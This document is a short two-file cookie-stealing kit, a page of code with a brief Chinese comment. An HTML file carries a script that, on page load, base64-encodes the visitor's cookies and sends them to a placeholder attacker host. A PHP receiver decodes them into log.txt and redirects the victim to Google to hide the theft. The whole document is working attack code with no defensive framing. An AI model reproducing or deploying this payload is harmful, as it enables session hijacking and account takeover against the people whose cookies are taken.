cookie.html

<html>
    <body>
        <!-- Hello world! -->
        <script type="text/javascript">
            document.location='https://YOURWEBSITE.COM/cookiestealer.php?c='+encodeURIComponent(btoa(document.cookie));
        </script>
    </body>
</html>

cookiestealer.php php接受的并生成log.txt

<?php
    header ('Location:https://google.com');

    if (isset($_GET["c"]))
    {
        $cookies = base64_decode(urldecode($_GET["c"]));
        $file = fopen('log.txt', 'a');
        fwrite($file, $cookies . "\n\n");
    }
?>